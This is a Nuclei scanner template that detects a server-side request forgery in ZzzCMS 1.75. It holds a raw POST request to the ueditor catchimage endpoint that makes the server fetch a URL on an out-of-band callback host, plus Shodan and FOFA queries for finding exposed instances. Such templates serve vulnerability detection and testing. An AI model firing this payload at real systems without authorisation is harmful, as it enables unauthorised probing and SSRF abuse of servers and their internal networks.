id: zzzcms-ssrf

info:
  name: ZzzCMS 1.75 - Server-Side Request Forgery
  author: ritikchaddha
  severity: high
  reference:
    - https://www.hacking8.com/bug-web/Zzzcms/Zzzcms-1.75-ssrf.html
  metadata:
    max-request: 1
    verified: true
    shodan-query: html:"ZzzCMS"
    fofa-query: title="ZzzCMS"
  tags: zzzcms,ssrf,oast

variables:
  filename: "{{to_lower(rand_text_alpha(4))}}"

http:
  - raw:
      - |
        POST /plugins/ueditor/php/controller.php?action=catchimage&upfolder=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        source[0]=http://{{interactsh-url}}/{{filename}}.txt

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - '{"state":'
          - 'list":'
        condition: and

      - type: status
        status:
          - 200